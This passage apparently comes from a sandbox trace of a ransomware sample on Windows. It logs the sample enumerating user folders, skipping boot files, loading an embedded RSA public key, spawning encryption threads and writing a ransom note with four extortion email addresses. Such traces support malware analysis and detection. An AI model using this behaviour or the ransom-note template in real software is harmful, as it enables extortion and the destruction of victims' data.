encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0206.757] CreateFileW (lpFileName="C:\\Users\\Default\\NetHood\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\nethood\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0206.757] CreateFileW (lpFileName="C:\\Users\\Default\\NetHood\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\nethood\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0206.757] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\NetHood\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0206.757] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0206.757] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0206.757] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0206.757] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0206.757] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0206.757] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0206.757] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0206.757] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0206.757] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0206.758] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0206.758] lstrcmpW (lpString1="Pictures", lpString2="..") returned 1 [0206.758] lstrcmpW (lpString1="Pictures", lpString2=".") returned 1 [0206.758] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\Default" | out: lpString1="C:\\Users\\Default") returned="C:\\Users\\Default" [0206.758] lstrcatW (in: lpString1="C:\\Users\\Default", lpString2="\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0206.758] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Pictures" | out: lpString1="C:\\Users\\Default\\Pictures") returned="C:\\Users\\Default\\Pictures" [0206.758] SetErrorMode (uMode=0x1) returned 0x1 [0206.758] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Pictures" | out: lpString1="C:\\Users\\Default\\Pictures") returned="C:\\Users\\Default\\Pictures" [0206.758] lstrcatW (in: lpString1="C:\\Users\\Default\\Pictures", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Pictures\\") returned="C:\\Users\\Default\\Pictures\\" [0206.758] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Default\\Pictures\\" | out: lpString1="C:\\Users\\Default\\Pictures\\") returned="C:\\Users\\Default\\Pictures\\" [0206.758] lstrcatW (in: lpString1="C:\\Users\\Default\\Pictures\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\Pictures\\*.*") returned="C:\\Users\\Default\\Pictures\\*.*" [0206.758] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Pictures\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x4372438 [0206.758] PathFindFileNameW (pszPath="C:\\Users\\Default\\Pictures") returned="Pictures" [0206.758] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Pictures" | out: lpString1="Pictures") returned="Pictures" [0206.758] StrStrW (lpFirst="desktop.ini", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0206.758] StrStrW (lpFirst="desktop.ini", lpSrch="ntldr") returned 0x0 [0206.758] StrStrW (lpFirst="desktop.ini", lpSrch="NTLDR") returned 0x0 [0206.758] StrStrW (lpFirst="desktop.ini", lpSrch="NTDETECT.COM") returned 0x0 [0206.758] StrStrW (lpFirst="desktop.ini", lpSrch="ntdetect.com") returned 0x0 [0206.758] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Pictures\\") returned 30 [0206.758] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\Default\\Pictures\\") [0206.758] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0206.758] lstrcpyW (in: lpString1=0x17cf1c, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0206.758] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\Default\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Pictures\\") returned="\\\\?\\C:\\Users\\Default\\Pictures\\" [0206.758] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xecc [0206.759] Sleep (dwMilliseconds=0x96) [0206.908] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0206.908] FindClose (in: hFindFile=0x4372438 | out: hFindFile=0x4372438) returned 1 [0206.908] FindClose (in: hFindFile=0x4372438 | out: hFindFile=0x4372438) returned 0 [0206.908] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Pictures" | out: lpString1="C:\\Users\\Default\\Pictures") returned="C:\\Users\\Default\\Pictures" [0206.908] lstrcatW (in: lpString1="C:\\Users\\Default\\Pictures", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\Pictures\\*.*") returned="C:\\Users\\Default\\Pictures\\*.*" [0206.908] SetErrorMode (uMode=0x1) returned 0x1 [0206.908] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Default\\Pictures\\_HELP_INSTRUCTION.TXT") returned 47 [0206.908] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0206.909] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0206.909] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0xed0) returned 0x0 [0206.909] RegQueryValueExW (in: hKey=0xed0, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43801a8, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x43801a8*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0206.909] RegCloseKey (hKey=0xed0) returned 0x0 [0206.909] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0206.909] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0206.909] CreateFileW (lpFileName="C:\\Users\\Default\\Pictures\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\pictures\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0206.909] CreateFileW (lpFileName="C:\\Users\\Default\\Pictures\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\pictures\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0206.909] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Pictures\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x4372438 [0206.909] PathFindFileNameW (pszPath="C:\\Users\\Default\\Pictures") returned="Pictures" [0206.909] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Pictures" | out: lpString1="Pictures") returned="Pictures" [0206.909] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\Default" | out: lpString1="C:\\Users\\Default") returned="C:\\Users\\Default" [0206.909] lstrcatW (in: lpString1="C:\\Users\\Default", lpString2="\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0206.909] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="PrintHood" | out: lpString1="C:\\Users\\Default\\PrintHood") returned="C:\\Users\\Default\\PrintHood" [0206.909] SetErrorMode (uMode=0x1) returned 0x1 [0206.910] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\PrintHood" | out: lpString1="C:\\Users\\Default\\PrintHood") returned="C:\\Users\\Default\\PrintHood" [0206.910] lstrcatW (in: lpString1="C:\\Users\\Default\\PrintHood", lpString2="\\" | out: lpString1="C:\\Users\\Default\\PrintHood\\") returned="C:\\Users\\Default\\PrintHood\\" [0206.910] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Default\\PrintHood\\" | out: lpString1="C:\\Users\\Default\\PrintHood\\") returned="C:\\Users\\Default\\PrintHood\\" [0206.910] lstrcatW (in: lpString1="C:\\Users\\Default\\PrintHood\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\PrintHood\\*.*") returned="C:\\Users\\Default\\PrintHood\\*.*" [0206.910] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\PrintHood\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0206.910] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0206.910] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\PrintHood" | out: lpString1="C:\\Users\\Default\\PrintHood") returned="C:\\Users\\Default\\PrintHood" [0206.910] lstrcatW (in: lpString1="C:\\Users\\Default\\PrintHood", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\PrintHood\\*.*") returned="C:\\Users\\Default\\PrintHood\\*.*" [0206.910] SetErrorMode (uMode=0x1) returned 0x1 [0206.910] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Default\\PrintHood\\_HELP_INSTRUCTION.TXT") returned 48 [0206.910] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0206.910] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0206.910] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0xed4) returned 0x0 [0206.910] RegQueryValueExW (in: hKey=0xed4, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43803d8, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x43803d8*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0206.910] RegCloseKey (hKey=0xed4) returned 0x0 [0206.910] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0206.910] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0206.910] CreateFileW (lpFileName="C:\\Users\\Default\\PrintHood\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\printhood\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0206.910] CreateFileW (lpFileName="C:\\Users\\Default\\PrintHood\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\printhood\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0206.911] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\PrintHood\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0206.911] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0206.911] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0206.911] lstrcmpW (lpString1="Recent", lpString2="..") returned 1 [0206.911] lstrcmpW (lpString1="Recent", lpString2=".") returned 1 [0206.911] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\Default" | out: lpString1="C:\\Users\\Default") returned="C:\\Users\\Default" [0206.911] lstrcatW (in: lpString1="C:\\Users\\Default", lpString2="\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0206.911] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Recent" | out: lpString1="C:\\Users\\Default\\Recent") returned="C:\\Users\\Default\\Recent" [0206.911] SetErrorMode (uMode=0x1) returned 0x1 [0206.911] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Recent" | out: lpString1="C:\\Users\\Default\\Recent") returned="C:\\Users\\Default\\Recent" [0206.911] lstrcatW (in: lpString1="C:\\Users\\Default\\Recent", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Recent\\") returned="C:\\Users\\Default\\Recent\\" [0206.911] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Default\\Recent\\" | out: lpString1="C:\\Users\\Default\\Recent\\") returned="C:\\Users\\Default\\Recent\\" [0206.911] lstrcatW (in: lpString1="C:\\Users\\Default\\Recent\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\Recent\\*.*") returned="C:\\Users\\Default\\Recent\\*.*" [0206.911] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Recent\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0206.911] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0206.911] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Recent" | out: lpString1="C:\\Users\\Default\\Recent") returned="C:\\Users\\Default\\Recent" [0206.911] lstrcatW (in: lpString1="C:\\Users\\Default\\Recent", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\Recent\\*.*") returned="C:\\Users\\Default\\Recent\\*.*" [0206.911] SetErrorMode (uMode=0x1) returned 0x1 [0206.911] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Default\\Recent\\_HELP_INSTRUCTION.TXT") returned 45 [0206.911] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0206.911] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0206.911] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0xed4) returned 0x0 [0206.912] RegQueryValueExW (in: hKey=0xed4, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x4380608, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x4380608*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0206.912] RegCloseKey (hKey=0xed4) returned 0x0 [0206.912] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0206.912] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0206.912] CreateFileW (lpFileName="C:\\Users\\Default\\Recent\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\recent\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0206.912] CreateFileW (lpFileName="C:\\Users\\Default\\Recent\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\recent\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0206.912] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Recent\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0206.912] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0206.912] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0206.912] lstrcmpW (lpString1="Saved Games", lpString2="..") returned 1 [0206.912] lstrcmpW (lpString1="Saved Games", lpString2=".") returned 1 [0206.912] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\Default" | out: lpString1="C:\\Users\\Default") returned="C:\\Users\\Default" [0206.912] lstrcatW (in: lpString1="C:\\Users\\Default", lpString2="\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0206.912] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Saved Games" | out: lpString1="C:\\Users\\Default\\Saved Games") returned="C:\\Users\\Default\\Saved Games" [0206.912] SetErrorMode (uMode=0x1) returned 0x1 [0206.912] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Saved Games" | out: lpString1="C:\\Users\\Default\\Saved Games") returned="C:\\Users\\Default\\Saved Games" [0206.912] lstrcatW (in: lpString1="C:\\Users\\Default\\Saved Games", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Saved Games\\") returned="C:\\Users\\Default\\Saved Games\\" [0206.912] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Default\\Saved Games\\" | out: lpString1="C:\\Users\\Default\\Saved Games\\") returned="C:\\Users\\Default\\Saved Games\\" [0206.912] lstrcatW (in: lpString1="C:\\Users\\Default\\Saved Games\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\Saved Games\\*.*") returned="C:\\Users\\Default\\Saved Games\\*.*" [0206.912] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Saved Games\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x4372438 [0206.912] PathFindFileNameW (pszPath="C:\\Users\\Default\\Saved Games") returned="Saved Games" [0206.912] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Saved Games" | out: lpString1="Saved Games") returned="Saved Games" [0206.913] StrStrW (lpFirst="desktop.ini", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0206.913] StrStrW (lpFirst="desktop.ini", lpSrch="ntldr") returned 0x0 [0206.913] StrStrW (lpFirst="desktop.ini", lpSrch="NTLDR") returned 0x0 [0206.913] StrStrW (lpFirst="desktop.ini", lpSrch="NTDETECT.COM") returned 0x0 [0206.913] StrStrW (lpFirst="desktop.ini", lpSrch="ntdetect.com") returned 0x0 [0206.913] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Saved Games\\") returned 33 [0206.913] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\Default\\Saved Games\\") [0206.913] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0206.913] lstrcpyW (in: lpString1=0x17cf1c, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0206.913] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\Default\\Saved Games\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Saved Games\\") returned="\\\\?\\C:\\Users\\Default\\Saved Games\\" [0206.913] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xed8 [0206.913] Sleep (dwMilliseconds=0x96) [0207.066] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0207.066] FindClose (in: hFindFile=0x4372438 | out: hFindFile=0x4372438) returned 1 [0207.067] FindClose (in: hFindFile=0x4372438 | out: hFindFile=0x4372438) returned 0 [0207.067] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Saved Games" | out: lpString1="C:\\Users\\Default\\Saved Games") returned="C:\\Users\\Default\\Saved Games" [0207.067] lstrcatW (in: lpString1="C:\\Users\\Default\\Saved Games", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\Saved Games\\*.*") returned="C:\\Users\\Default\\Saved Games\\*.*" [0207.067] SetErrorMode (uMode=0x1) returned 0x1 [0207.067] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Default\\Saved Games\\_HELP_INSTRUCTION.TXT") returned 50 [0207.067] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0207.067] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0207.067] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0xedc) returned 0x0 [0207.068] RegQueryValueExW (in: hKey=0xedc, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x4380838, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x4380838*=0x65, 